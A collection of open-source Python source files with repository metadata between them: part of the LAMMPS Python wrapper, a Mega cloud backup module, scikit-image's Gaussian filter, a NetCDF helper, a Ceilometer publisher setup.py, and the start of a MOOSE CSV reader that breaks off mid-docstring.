self.lib.lammps_extract_compute.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr[0]
if type == 1:
self.lib.lammps_extract_compute.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr
if type == 2:
self.lib.lammps_extract_compute.restype = POINTER(POINTER(c_double))
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr
return None
# extract fix info
# in case of global datum, free memory for 1 double via lammps_free()
# double was allocated by library interface function
def extract_fix(self,id,style,type,i=0,j=0):
if id: id = id.encode()
if style == 0:
self.lib.lammps_extract_fix.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
result = ptr[0]
self.lib.lammps_free(ptr)
return result
elif (style == 1) or (style == 2):
if type == 1:
self.lib.lammps_extract_fix.restype = POINTER(c_double)
elif type == 2:
self.lib.lammps_extract_fix.restype = POINTER(POINTER(c_double))
else:
return None
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
return ptr
else:
return None
# extract variable info
# free memory for 1 double or 1 vector of doubles via lammps_free()
# for vector, must copy nlocal returned values to local c_double vector
# memory was allocated by library interface function
def extract_variable(self,name,group,type):
if name: name = name.encode()
if group: group = group.encode()
if type == 0:
self.lib.lammps_extract_variable.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_variable(self.lmp,name,group)
result = ptr[0]
self.lib.lammps_free(ptr)
return result
if type == 1:
self.lib.lammps_extract_global.restype = POINTER(c_int)
nlocalptr = self.lib.lammps_extract_global(self.lmp,"nlocal".encode())
nlocal = nlocalptr[0]
result = (c_double*nlocal)()
self.lib.lammps_extract_variable.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_variable(self.lmp,name,group)
for i in range(nlocal): result[i] = ptr[i]
self.lib.lammps_free(ptr)
return result
return None
# set variable value
# value is converted to string
# returns 0 for success, -1 if failed
def set_variable(self,name,value):
if name: name = name.encode()
if value: value = str(value).encode()
return self.lib.lammps_set_variable(self.lmp,name,value)
# return current value of thermo keyword
def get_thermo(self,name):
if name: name = name.encode()
self.lib.lammps_get_thermo.restype = c_double
return self.lib.lammps_get_thermo(self.lmp,name)
# return total number of atoms in system
def get_natoms(self):
return self.lib.lammps_get_natoms(self.lmp)
# return vector of atom properties gathered across procs, ordered by atom ID
# name = atom property recognized by LAMMPS in atom->extract()
# type = 0 for integer values, 1 for double values
# count = number of per-atom valus, 1 for type or charge, 3 for x or f
# returned data is a 1d vector - doc how it is ordered?
# NOTE: how could we insure are converting to correct Python type
# e.g. for Python list or NumPy, etc
# ditto for extact_atom() above
def gather_atoms(self,name,type,count):
if name: name = name.encode()
natoms = self.lib.lammps_get_natoms(self.lmp)
if type == 0:
data = ((count*natoms)*c_int)()
self.lib.lammps_gather_atoms(self.lmp,name,type,count,data)
elif type == 1:
data = ((count*natoms)*c_double)()
self.lib.lammps_gather_atoms(self.lmp,name,type,count,data)
else: return None
return data
# scatter vector of atom properties across procs, ordered by atom ID
# name = atom property recognized by LAMMPS in atom->extract()
# type = 0 for integer values, 1 for double values
# count = number of per-atom valus, 1 for type or charge, 3 for x or f
# assume data is of correct type and length, as created by gather_atoms()
# NOTE: how could we insure are passing correct type to LAMMPS
# e.g. for Python list or NumPy, etc
def scatter_atoms(self,name,type,count,data):
if name: name = name.encode()
self.lib.lammps_scatter_atoms(self.lmp,name,type,count,data)
# create N atoms on all procs
# N = global number of atoms
# id = ID of each atom (optional, can be None)
# type = type of each atom (1 to Ntypes) (required)
# x = coords of each atom as (N,3) array (required)
# v = velocity of each atom as (N,3) array (optional, can be None)
# NOTE: how could we insure are passing correct type to LAMMPS
# e.g. for Python list or NumPy, etc
# ditto for gather_atoms() above
def create_atoms(self,n,id,type,x,v,image=None,shrinkexceed=False):
if id:
id_lmp = (c_int * n)()
id_lmp[:] = id
else:
id_lmp = id
if image:
image_lmp = (c_int * n)()
image_lmp[:] = image
else:
image_lmp = image
type_lmp = (c_int * n)()
type_lmp[:] = type
self.lib.lammps_create_atoms(self.lmp,n,id_lmp,type_lmp,x,v,image_lmp,shrinkexceed)
@property
def uses_exceptions(self):
""" Return whether the LAMMPS shared library was compiled with C++ exceptions handling enabled """
try:
if self.lib.lammps_has_error:
return True
except(AttributeError):
return False
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
################################################################################
# Alternative Python Wrapper
# Written by Richard Berger <richard.berger@temple.edu>
################################################################################
class OutputCapture(object):
""" Utility class to capture LAMMPS library output """
def __init__(self):
self.stdout_pipe_read, self.stdout_pipe_write = os.pipe()
self.stdout_fd = 1
def __enter__(self):
self.stdout = os.dup(self.stdout_fd)
os.dup2(self.stdout_pipe_write, self.stdout_fd)
return self
def __exit__(self, type, value, tracebac):
os.dup2(self.stdout, self.stdout_fd)
os.close(self.stdout)
os.close(self.stdout_pipe_read)
os.close(self.stdout_pipe_write)
# check if we have more to read from the pipe
def more_data(self, pipe):
r, _, _ = select.select([pipe], [], [], 0)
return bool(r)
# read the whole pipe
def read_pipe(self, pipe):
out = ""
while self.more_data(pipe):
out += os.read(pipe, 1024).decode()
return out
@property
def output(self):
return self.read_pipe(self.stdout_pipe_read)
class Variable(object):
def __init__(self, lammps_wrapper_instance, name, style, definition):
self.wrapper = lammps_wrapper_instance
self.name = name
self.style = style
self.definition = definition.split()
@property
def value(self):
if self.style == 'atom':
return list(self.wrapper.lmp.extract_variable(self.name, "all", 1))
else:
value = self.wrapper.lmp_print('"${%s}"' % self.name).strip()
try:
return float(value)
except ValueError:
return value
class AtomList(object):
def __init__(self, lammps_wrapper_instance):
self.lmp = lammps_wrapper_instance
self.natoms = self.lmp.system.natoms
self.dimensions = self.lmp.system.dimensions
def __getitem__(self, index):
if self.dimensions == 2:
return Atom2D(self.lmp, index + 1)
return Atom(self.lmp, index + 1)
class Atom(object):
def __init__(self, lammps_wrapper_instance, index):
self.lmp = lammps_wrapper_instance
self.index = index
@property
def id(self):
return int(self.lmp.eval("id[%d]" % self.index))
@property
def type(self):
return int(self.lmp.eval("type[%d]" % self.index))
@property
def mol(self):
return self.lmp.eval("mol[%d]" % self.index)
@property
def mass(self):
return self.lmp.eval("mass[%d]" % self.index)
@property
def position(self):
return (self.lmp.eval("x[%d]" % self.index),
self.lmp.eval("y[%d]" % self.index),
self.lmp.eval("z[%d]" % self.index))
@position.setter
def position(self, value):
self.lmp.set("atom", self.index, "x", value[0])
self.lmp.set("atom", self.index, "y", value[1])
self.lmp.set("atom", self.index, "z", value[2])
@property
def velocity(self):
return (self.lmp.eval("vx[%d]" % self.index),
self.lmp.eval("vy[%d]" % self.index),
self.lmp.eval("vz[%d]" % self.index))
@property
def force(self):
return (self.lmp.eval("fx[%d]" % self.index),
self.lmp.eval("fy[%d]" % self.index),
self.lmp.eval("fz[%d]" % self.index))
@property
def charge(self):
return self.lmp.eval("q[%d]" % self.index)
class Atom2D(Atom):
def __init__(self, lammps_wrapper_instance, index):
super(Atom2D, self).__init__(lammps_wrapper_instance, index)
@property
def position(self):
return (self.lmp.eval("x[%d]" % self.index),
self.lmp.eval("y[%d]" % self.index))
@position.setter
def position(self, value):
self.lmp.set("atom", self.index, "x", value[0])
self.lmp.set("atom", self.index, "y", value[1])
@property
def velocity(self):
return (self.lmp.eval("vx[%d]" % self.index),
self.lmp.eval("vy[%d]" % self.index))
@property
def force(self):
return (self.lmp.eval("fx[%d]" % self.index),
self.lmp.eval("fy[%d]" % self.index))
def get_thermo_data(output):
""" traverse output of runs and extract thermo data columns """
if isinstance(output, str):
lines = output.splitlines()
else:
lines = output
runs = []
columns = []
in_run = False
current_run = {}
for line in lines:
if line.startswith("Per MPI rank memory allocation"):
in_run = True
elif in_run and len(columns) == 0:
# first line after memory usage are column names
columns = line.split()
current_run = {}
for col in columns:
current_run[col] = []
elif line.startswith("Loop time of "):
in_run = False
columns = None
thermo_data = namedtuple('ThermoData', list(current_run.keys()))(*list(current_run.values()))
r = {'thermo' : thermo_data }
runs.append(namedtuple('Run', list(r.keys()))(*list(r.values())))
elif in_run and len(columns) > 0:
values = [float(x) for x in line.split()]
for i, col in enumerate(columns):
current_run[col].append(values[i])
return runs
class PyLammps(object):
"""
More Python-like wrapper for LAMMPS (e.g., for iPython)
See examples/ipython for usage
"""
def __init__(self,name="",cmdargs=None,ptr=None,comm=None):
if ptr:
if isinstance(ptr,PyLammps):
self.lmp = ptr.lmp
elif isinstance(ptr,lammps):
self.lmp = ptr
else:
self.lmp = lammps(name=name,cmdargs=cmdargs,ptr=ptr,comm=comm)
else:
self.lmp = lammps(name=name,cmdargs=cmdargs,ptr=None,comm=comm)
print("LAMMPS output is captured by PyLammps wrapper")
self._cmd_history = []
self.runs = []
def __del__(self):
if self.lmp: self.lmp.close()
self.lmp = None
def close(self):
if self.lmp: self.lmp.close()
self.lmp = None
def version(self):
return self.lmp.version()
def file(self,file):
self.lmp.file(file)
def write_script(self,filename):
""" Write LAMMPS script file containing all commands executed up until now """
with open(filename, "w") as f:
for cmd in self._cmd_history:
f.write("%s\n" % cmd)
def command(self,cmd):
self.lmp.command(cmd)
self._cmd_history.append(cmd)
def run(self, *args, **kwargs):
output = self.__getattr__('run')(*args, **kwargs)
self.runs += get_thermo_data(output)
return output
@property
def last_run(self):
if len(self.runs) > 0:
return self.runs[-1]
return None
@property
def atoms(self):
return AtomList(self)
@property
def system(self):
output = self.info("system")
d = self._parse_info_system(output)
return namedtuple('System', d.keys())(*d.values())
@property
def communication(self):
output = self.info("communication")
d = self._parse_info_communication(output)
return namedtuple('Communication', d.keys())(*d.values())
@property
def computes(self):
output = self.info("computes")
return self._parse_element_list(output)
@property
def dumps(self):
output = self.info("dumps")
return self._parse_element_list(output)
@property
def fixes(self):
output = self.info("fixes")
return self._parse_element_list(output)
@property
def groups(self):
output = self.info("groups")
return self._parse_groups(output)
@property
def variables(self):
output = self.info("variables")
vars = {}
for v in self._parse_element_list(output):
vars[v['name']] = Variable(self, v['name'], v['style'], v['def'])
return vars
def eval(self, expr):
value = self.lmp_print('"$(%s)"' % expr).strip()
try:
return float(value)
except ValueError:
return value
def _split_values(self, line):
return [x.strip() for x in line.split(',')]
def _get_pair(self, value):
return [x.strip() for x in value.split('=')]
def _parse_info_system(self, output):
lines = output[6:-2]
system = {}
for line in lines:
if line.startswith("Units"):
system['units'] = self._get_pair(line)[1]
elif line.startswith("Atom style"):
system['atom_style'] = self._get_pair(line)[1]
elif line.startswith("Atom map"):
system['atom_map'] = self._get_pair(line)[1]
elif line.startswith("Atoms"):
parts = self._split_values(line)
system['natoms'] = int(self._get_pair(parts[0])[1])
system['ntypes'] = int(self._get_pair(parts[1])[1])
system['style'] = self._get_pair(parts[2])[1]
elif line.startswith("Kspace style"):
system['kspace_style'] = self._get_pair(line)[1]
elif line.startswith("Dimensions"):
system['dimensions'] = int(self._get_pair(line)[1])
elif line.startswith("Orthogonal box"):
system['orthogonal_box'] = [float(x) for x in self._get_pair(line)[1].split('x')]
elif line.startswith("Boundaries"):
system['boundaries'] = self._get_pair(line)[1]
elif line.startswith("xlo"):
keys, values = [self._split_values(x) for x in self._get_pair(line)]
for key, value in zip(keys, values):
system[key] = float(value)
elif line.startswith("ylo"):
keys, values = [self._split_values(x) for x in self._get_pair(line)]
for key, value in zip(keys, values):
system[key] = float(value)
elif line.startswith("zlo"):
keys, values = [self._split_values(x) for x in self._get_pair(line)]
for key, value in zip(keys, values):
system[key] = float(value)
elif line.startswith("Molecule type"):
system['molecule_type'] = self._get_pair(line)[1]
elif line.startswith("Bonds"):
parts = self._split_values(line)
system['nbonds'] = int(self._get_pair(parts[0])[1])
system['nbondtypes'] = int(self._get_pair(parts[1])[1])
system['bond_style'] = self._get_pair(parts[2])[1]
elif line.startswith("Angles"):
parts = self._split_values(line)
system['nangles'] = int(self._get_pair(parts[0])[1])
system['nangletypes'] = int(self._get_pair(parts[1])[1])
system['angle_style'] = self._get_pair(parts[2])[1]
elif line.startswith("Dihedrals"):
parts = self._split_values(line)
system['ndihedrals'] = int(self._get_pair(parts[0])[1])
system['nangletypes'] = int(self._get_pair(parts[1])[1])
system['dihedral_style'] = self._get_pair(parts[2])[1]
elif line.startswith("Impropers"):
parts = self._split_values(line)
system['nimpropers'] = int(self._get_pair(parts[0])[1])
system['nimpropertypes'] = int(self._get_pair(parts[1])[1])
system['improper_style'] = self._get_pair(parts[2])[1]
return system
def _parse_info_communication(self, output):
lines = output[6:-3]
comm = {}
for line in lines:
if line.startswith("MPI library"):
comm['mpi_version'] = line.split(':')[1].strip()
elif line.startswith("Comm style"):
parts = self._split_values(line)
comm['comm_style'] = self._get_pair(parts[0])[1]
comm['comm_layout'] = self._get_pair(parts[1])[1]
elif line.startswith("Processor grid"):
comm['proc_grid'] = [int(x) for x in self._get_pair(line)[1].split('x')]
elif line.startswith("Communicate velocities for ghost atoms"):
comm['ghost_velocity'] = (self._get_pair(line)[1] == "yes")
elif line.startswith("Nprocs"):
parts = self._split_values(line)
comm['nprocs'] = int(self._get_pair(parts[0])[1])
comm['nthreads'] = int(self._get_pair(parts[1])[1])
return comm
def _parse_element_list(self, output):
lines = output[6:-3]
elements = []
for line in lines:
element_info = self._split_values(line.split(':')[1].strip())
element = {'name': element_info[0]}
for key, value in [self._get_pair(x) for x in element_info[1:]]:
element[key] = value
elements.append(element)
return elements
def _parse_groups(self, output):
lines = output[6:-3]
groups = []
group_pattern = re.compile(r"(?P<name>.+) \((?P<type>.+)\)")
for line in lines:
m = group_pattern.match(line.split(':')[1].strip())
group = {'name': m.group('name'), 'type': m.group('type')}
groups.append(group)
return groups
def lmp_print(self, s):
""" needed for Python2 compatibility, since print is a reserved keyword """
return self.__getattr__("print")(s)
def __getattr__(self, name):
def handler(*args, **kwargs):
cmd_args = [name] + [str(x) for x in args]
with OutputCapture() as capture:
self.command(' '.join(cmd_args))
output = capture.output
if 'verbose' in kwargs and kwargs['verbose']:
print(output)
lines = output.splitlines()
if len(lines) > 1:
return lines
elif len(lines) == 1:
return lines[0]
return None
return handler
class IPyLammps(PyLammps):
"""
iPython wrapper for LAMMPS which adds embedded graphics capabilities
"""
def __init__(self,name="",cmdargs=None,ptr=None,comm=None):
super(IPyLammps, self).__init__(name=name,cmdargs=cmdargs,ptr=ptr,comm=comm)
def image(self, filename="snapshot.png", group="all", color="type", diameter="type",
size=None, view=None, center=None, up=None, zoom=1.0):
cmd_args = [group, "image", filename, color, diameter]
if size:
width = size[0]
height = size[1]
cmd_args += ["size", width, height]
if view:
theta = view[0]
phi = view[1]
cmd_args += ["view", theta, phi]
if center:
flag = center[0]
Cx = center[1]
Cy = center[2]
Cz = center[3]
cmd_args += ["center", flag, Cx, Cy, Cz]
if up:
Ux = up[0]
Uy = up[1]
Uz = up[2]
cmd_args += ["up", Ux, Uy, Uz]
if zoom:
cmd_args += ["zoom", zoom]
cmd_args.append("modify backcolor white")
self.write_dump(*cmd_args)
from IPython.core.display import Image
return Image('snapshot.png')
def video(self, filename):
from IPython.display import HTML
return HTML("<video controls><source src=\"" + filename + "\"></video>")
|
epfl-cosmo/lammps
|
python/lammps.py
|
Python
|
gpl-2.0
| 29,726
|
[
"LAMMPS"
] |
2ae700a82a79748f2d7e939d6804c980df39cd963d4aab1198d16599cc77179a
|
from core import settings, uploader, filesystem
from core.logger import log
import os
class Backup(object):
"""
Class used to make a backup, in other words, the "kernel".
"""
def __init__(self, backup_path):
"""
Constructor. It used settings file
"""
self.recursive = True
self.backup_path = backup_path
self.uploader = uploader.UploaderMega()
self.actual_filesystem = filesystem.FileSystem(
initial_path=backup_path)
self.remote_filesystem = None
# Modes
self.initial_backup_mode = False
self.remote_home_mode = False
self.resync_mode = False
self.unknown_mode = False
def detect_mode(self):
"""
This method, depends of remote repository, and local folder, decides
the backup mode
"""
#Initial backup, when in mega doesn't exist anything.
#Resync, when in mega exists something and in home too.
#Remote-home, when mega has content and local folder is empty
#or doesn't exist.
remote = self.uploader.find_folder(
settings.get_config('remote', 'folder'))
summary = self.uploader.get_file(
filename=settings.get_config('remote','summary_file'),
path=settings.get_config('remote', 'folder'))
empty_dir = filesystem.os_empty_dir(self.backup_path)
if remote and summary and empty_dir: #(000)
log.debug("REMOTE HOME 1")
self.remote_home_mode = True
elif remote and summary and not empty_dir: #(001)
log.debug("RESYNC 1")
self.resync_mode = True
elif remote and not summary and empty_dir: #(010)
log.debug("UNKNOWN MODE 1")
self.unknown_mode = True
elif remote and not summary and not empty_dir: #(011)
log.debug("INITIAL BACKUP 1")
self.initial_backup_mode = True
elif not remote and summary and empty_dir: #(100)
#Impossible
log.debug("UNKNOWN MODE 2")
self.unknown_mode = True
elif not remote and summary and not empty_dir: #(101)
#Impossible
log.debug("UNKNOWN MODE 3")
self.unknown_mode = True
elif not remote and not summary and empty_dir: #(110)
log.critical("Local directory doesn't exist and remote neither")
print "Local directory doesn't exist & remote neither, existing..."
log.debug("UNKNOWN MODE 4")
self.unknown_mode = True
elif not remote and not summary and not empty_dir: #(111)
log.debug("INITIAL BACKUP 2")
self.initial_backup_mode = True
def run(self, options=None):
"""
This method is the main function in this class.
Pre:
- Previous execution of detect_mode() method.
Return:
None
"""
if self.initial_backup_mode:
log.info("INITIAL BACKUP MODE")
log.debug("0 - READY BACKUP")
self.prepare_to_init_backup()
log.debug("2 - GENERATE ACTUAL FS")
self.actual_filesystem.generate()
log.debug("5.5 - UPLOAD ALL LOCAL FS")
self.upload_all()
log.debug("6 - UPDATE REMOTE FS")
self.upload_actual_fs_struct()
elif self.remote_home_mode:
log.info("REMOTE_HOME MODE")
log.debug("1 - LOAD REMOTE FS")
self.get_remote_fs_struct()
log.debug("2 - SYNC REMOTE HOME")
self.sync_remote_home()
elif self.resync_mode: # Reprocess
log.info("RESYNC")
log.debug("1 - LOAD REMOTE FS")
self.get_remote_fs_struct()
log.debug("2 - GENERATE ACTUAL FS")
self.actual_filesystem.generate()
log.debug("3,4 - CALCULATE CHANGES")
changes = filesystem.compare_fs(actual_fs=self.actual_filesystem,
old_fs=self.remote_filesystem)
log.debug("5 - APPLY DIFERENCES (DELETE/DOWNLOAD AND UPLOAD)")
self.process_changes_in_remote(changes)
log.debug("6 - UPDATE REMOTE FS")
self.upload_actual_fs_struct()
else:
log.critical("UNKNOWN MODE, existing...")
def upload_all(self):
"""
Upload a complete local FileSystem
Pre:
- self.actual_filesystem is set. This is possible, calling the
method filesystem.generate()
Return:
None
"""
for file in self.actual_filesystem.files:
if file.type == filesystem.FOLDER:
if file.relative_path == '/':
file.relative_path = ''
remote_folder = os.path.join(
settings.get_config('remote', 'folder'),
file.relative_path,
file.name)
rem_desc = self.uploader.mkdir(remote_folder)
file.remote_desc = rem_desc
elif file.type == filesystem.FILE:
remote_folder = '%s/%s' % (
settings.get_config('remote', 'folder'),
file.relative_path)
rem_desc = self.uploader.upload(remote_folder, file.path)
file.remote_desc = rem_desc
def prepare_to_init_backup(self):
"""
This method is used to prepare remote folder (in Mega) to make a backup
"""
self.uploader.mkdir(settings.get_config('remote', 'folder'))
def process_changes_in_remote(self, changes):
"""
This method is used to changes changes in Mega (synchronize).
"""
log.debug("Processing changes in remote")
remove_files = changes['removed_files']
for file in remove_files:
log.debug("Removing file %s" % file)
status = self.uploader.remove(
path='%s/%s' % (settings.get_config('remote', 'folder'),
file.relative_path),
filename=file.name)
if not status:
log.error("ERROR DELETING REMOTE FILE %s" % file)
remove_folders = changes['removed_folders']
for folder in remove_folders:
log.debug("Removing folder %s" % folder)
status = self.uploader.remove(
path='%s/%s' % (settings.get_config('remote', 'folder'),
folder.relative_path),
filename=folder.name)
if not status:
log.error("Folder not deleted correctly in remote %s" % folder)
new_folders = changes['new_folders']
for folder in new_folders:
log.debug("Creating remote folder %s" % folder)
remote_folder = '%s/%s/%s' % (
settings.get_config('remote', 'folder'),
folder.relative_path,
folder.name)
rem_desc = self.uploader.mkdir(remote_folder)
new_files = changes['new_files']
for file in new_files:
log.debug("New file %s" % file)
remote_folder = '%s/%s' % (settings.get_config('remote', 'folder'),
file.relative_path)
rem_desc = self.uploader.upload(remote_folder, file.path)
to_download = changes['to_download']
for file in to_download:
log.debug("Download modified %s" % file)
path = '%s/%s' % (settings.get_config('remote', 'folder'),
file.relative_path)
content = self.uploader.get_content_by_path(path=path,
filename=file.name)
filesystem.create_file(
path=os.path.join(
self.backup_path,
file.relative_path),
name=file.name,
content=content)
new_files = changes['to_upload']
for file in new_files:
log.debug("Uploading file %s" % file)
remote_folder = '%s/%s' % (settings.get_config('remote', 'folder'),
file.relative_path)
rem_desc = self.uploader.upload(remote_folder, file.path)
def upload_actual_fs_struct(self):
self.actual_filesystem.dump_to_file('fs.dmp')
rem_desc = self.uploader.upload_raw(
path=settings.get_config('remote', 'folder'),
filename=settings.get_config('remote', 'summary_file'),
raw=self.actual_filesystem.get_dump())
return rem_desc
def get_remote_fs_struct(self):
file_desc = self.uploader.get_file(
filename=settings.get_config('remote', 'summary_file'),
path=settings.get_config('remote', 'folder'))
fs_descriptor = self.uploader.get_content_descriptor(
file_info=file_desc)
#print "DESCARGADO"
self.remote_filesystem = filesystem.load_filesystem_descriptor(
fs_descriptor)
def sync_remote_home(self):
#We have remote FS, then...
for file in self.remote_filesystem.files:
if file.relative_path == '/':
file.relative_path = ''
if file.type == filesystem.FILE: #Else, folder
path = '%s/%s' % (settings.get_config('remote', 'folder'),
file.relative_path)
content = self.uploader.get_content_by_path(path=path,
filename=file.name)
filesystem.create_file(
path=os.path.join(
self.backup_path,
file.relative_path),
name=file.name,
content=content)
elif file.type == filesystem.FOLDER:
path = os.path.join(self.backup_path,
file.relative_path,
file.name)
filesystem.os_mkdir(path)
def visit_path(self):
#Deprecated?
"""
Visit path and create summary file in binary
"""
log.critical("RUNNING, DEPRECATED")
level = 0
for root, subfolders, files in os.walk(self.path):
#print root
if not level:
actual_remote_folder = settings.get_config('remote', 'folder')
else:
actual_remote_folder = '%s/%s' % \
(actual_remote_folder, root.split('/')[-1])
#For each files
for fil in files:
#print "SUBO %s a %s" % (fil ,actual_remote_folder)
file_path = os.path.join(root, fil)
#print "ORIGEN %s" % file_path
#print file_path
rem_desc = self.uploader.upload(actual_remote_folder, file_path)
#For each subfolder
for subfolder in subfolders:
#print "CREO carpeta %s" % actual_remote_folder+'/'+subfolder
folder = os.path.join(actual_remote_folder, subfolder)
rem_desc = self.uploader.mkdir(folder)
level += 1
#print root
#print files
#print subfolders
|
plutec/megup
|
core/backup.py
|
Python
|
gpl-2.0
| 11,984
|
[
"VisIt"
] |
0aab3e6feca634d0accf1ec3567ade3ac576f8b9042816d1dbe4e98c56a21622
|
import collections as coll
import numpy as np
from scipy import ndimage
import warnings
from ..util import img_as_float
from ..color import guess_spatial_dimensions
__all__ = ['gaussian_filter']
def gaussian_filter(image, sigma, output=None, mode='nearest', cval=0,
multichannel=None):
"""Multi-dimensional Gaussian filter
Parameters
----------
image : array-like
input image (grayscale or color) to filter.
sigma : scalar or sequence of scalars
standard deviation for Gaussian kernel. The standard
deviations of the Gaussian filter are given for each axis as a
sequence, or as a single number, in which case it is equal for
all axes.
output : array, optional
The ``output`` parameter passes an array in which to store the
filter output.
mode : {'reflect', 'constant', 'nearest', 'mirror', 'wrap'}, optional
The `mode` parameter determines how the array borders are
handled, where `cval` is the value when mode is equal to
'constant'. Default is 'nearest'.
cval : scalar, optional
Value to fill past edges of input if `mode` is 'constant'. Default
is 0.0
multichannel : bool, optional (default: None)
Whether the last axis of the image is to be interpreted as multiple
channels. If True, each channel is filtered separately (channels are
not mixed together). Only 3 channels are supported. If `None`,
the function will attempt to guess this, and raise a warning if
ambiguous, when the array has shape (M, N, 3).
Returns
-------
filtered_image : ndarray
the filtered array
Notes
-----
This function is a wrapper around :func:`scipy.ndimage.gaussian_filter`.
Integer arrays are converted to float.
The multi-dimensional filter is implemented as a sequence of
one-dimensional convolution filters. The intermediate arrays are
stored in the same data type as the output. Therefore, for output
types with a limited precision, the results may be imprecise
because intermediate results may be stored with insufficient
precision.
Examples
--------
>>> a = np.zeros((3, 3))
>>> a[1, 1] = 1
>>> a
array([[ 0., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 0.]])
>>> gaussian_filter(a, sigma=0.4) # mild smoothing
array([[ 0.00163116, 0.03712502, 0.00163116],
[ 0.03712502, 0.84496158, 0.03712502],
[ 0.00163116, 0.03712502, 0.00163116]])
>>> gaussian_filter(a, sigma=1) # more smooting
array([[ 0.05855018, 0.09653293, 0.05855018],
[ 0.09653293, 0.15915589, 0.09653293],
[ 0.05855018, 0.09653293, 0.05855018]])
>>> # Several modes are possible for handling boundaries
>>> gaussian_filter(a, sigma=1, mode='reflect')
array([[ 0.08767308, 0.12075024, 0.08767308],
[ 0.12075024, 0.16630671, 0.12075024],
[ 0.08767308, 0.12075024, 0.08767308]])
>>> # For RGB images, each is filtered separately
>>> from skimage.data import astronaut
>>> image = astronaut()
>>> filtered_img = gaussian_filter(image, sigma=1, multichannel=True)
"""
spatial_dims = guess_spatial_dimensions(image)
if spatial_dims is None and multichannel is None:
msg = ("Images with dimensions (M, N, 3) are interpreted as 2D+RGB "
"by default. Use `multichannel=False` to interpret as "
"3D image with last dimension of length 3.")
warnings.warn(RuntimeWarning(msg))
multichannel = True
if multichannel:
# do not filter across channels
if not isinstance(sigma, coll.Iterable):
sigma = [sigma] * (image.ndim - 1)
if len(sigma) != image.ndim:
sigma = np.concatenate((np.asarray(sigma), [0]))
image = img_as_float(image)
return ndimage.gaussian_filter(image, sigma, mode=mode, cval=cval)
|
bennlich/scikit-image
|
skimage/filters/_gaussian.py
|
Python
|
bsd-3-clause
| 3,998
|
[
"Gaussian"
] |
62e548eb8727a122de0390ca7594fd20e7ba8b3309c340e42ed99e01c10f5af1
|
import os
import cdo
cdo = cdo.Cdo()
def split(name):
""" Returns the name of a file without the directory path
"""
path, filename = os.path.split(name)
return filename
def sample(ifile, **kwargs):
print 'called external function'
return ifile
def field_integral(ifile, **kwargs):
out = 'netcdf/field-integral_' + split(ifile)
fout = 'netcdf/gridarea_' + split(ifile)
mout = 'netcdf/mul_' + split(ifile)
ymean = 'netcdf/yrmean' + split(out)
cdo.gridarea(input=ifile, output=fout)
cdo.mul(input=ifile + ' ' + fout, output=mout)
cdo.fldsum(input=mout, output=out)
cdo.yearmean(input=out, output=ymean)
return ymean
|
fallisd/validate
|
validate/functions/external.py
|
Python
|
gpl-2.0
| 684
|
[
"NetCDF"
] |
ab7a48260f428f7e2b843d6323b5ecadb921380bbca1580212602706638ad59e
|
import os
from setuptools import setup
from pip.req import parse_requirements
# Utility function to read the README file. Used for the long_description.
# It's nice, because now 1) we have a top level README file and 2) it's easier
# to type in the README file than to put a raw string in below.
def read(fname):
with open(os.path.join(os.path.dirname(__file__), fname)) as f:
return f.read()
setup(
name="ceilometer-publisher-vaultaire",
version="0.0.21",
description="A publisher plugin for Ceilometer that outputs to Vaultaire",
author="Barney Desmond",
author_email="engineering@anchor.net.au",
url="https://github.com/anchor/ceilometer-publisher-vaultaire",
zip_safe=False,
packages=[
"ceilometer_publisher_vaultaire", # Does anyone know what this means?
],
package_data={
"ceilometer_publisher_vaultaire" : ["README.md"],
},
long_description=read("README"),
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: Apache Software License",
],
entry_points = {
"ceilometer.publisher": [
"vaultaire = ceilometer_publisher_vaultaire:VaultairePublisher",
],
},
install_requires=[str(req.req) for req in parse_requirements("requirements.txt")],
include_package_data=True
)
|
anchor/ceilometer-publisher-vaultaire
|
setup.py
|
Python
|
apache-2.0
| 1,372
|
[
"Desmond"
] |
f28f8952ee97e349f2c4bd6b0c89d686b0a5f9f1fd0bb48decf90132f4937903
|
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
import os
import glob
import pandas
import bisect
from .MooseDataFrame import MooseDataFrame
from . import message
class VectorPostprocessorReader(object):
"""
A Reader for MOOSE VectorPostprocessor data.
Args:
pattern[str]: A pattern of files (for use with glob) for loading.
MOOSE outputs VectorPostprocessor data in separate files for each timestep, using the timestep as
a prefix. For example: file_000.csv, file_001.csv, etc.
Therefore, a pattern acceptable for use with the python glob package must be supplied. For the
above files, "file_*.csv" should be supplied.
This object manages the loading and unloading of data and should always be in a valid state,
regardless of the existence of a file. It will also append new data and remove old/deleted data
on subsequent calls to "update()".
"""
def __init__(self, pattern, run_start_time=0):
self._pattern = pattern
self._timedata = MooseDataFrame(self._pattern.replace('*', 'time'),
run_start_time=None,
index='timestep')
self._frames = dict()
self._time = -1
self._index = None
self._run_start_time = run_start_time
self.update()
@property
def data(self):
return self._frames.get(self._index, pandas.DataFrame())
@property
def filename(self):
if self._frames:
return self._frames[self._index].filename
def __getitem__(self, keys):
"""
Operator[] returns the data for the current time.
Args:
keys[str|list]: The key(s) to return.
"""
return self._frames[self._index][keys]
def __bool__(self):
"""
Allows this object to be used in boolean cases.
Example:
data = VectorPostprocessorReader('files_*.csv')
if not data:
print 'No data found!'
"""
return self._index in self._frames
def __contains__(self, variable):
"""
Returns true if the variable exists in the data structure.
"""
return variable in self._frames[self._index]
def times(self):
"""
Returns the list of available time indices contained in the data.
"""
return sorted(self._frames.keys())
def clear(self):
"""
Remove all data.
"""
self._frames = dict()
self._index = None
self._time = None
def variables(self):
"""
Return a list of postprocessor variable names listed in the reader.
"""
if self._index is not None:
return self._frames[self._index].data.columns.tolist()
def update(self, time=None):
"""
Update data by adding/removing files.
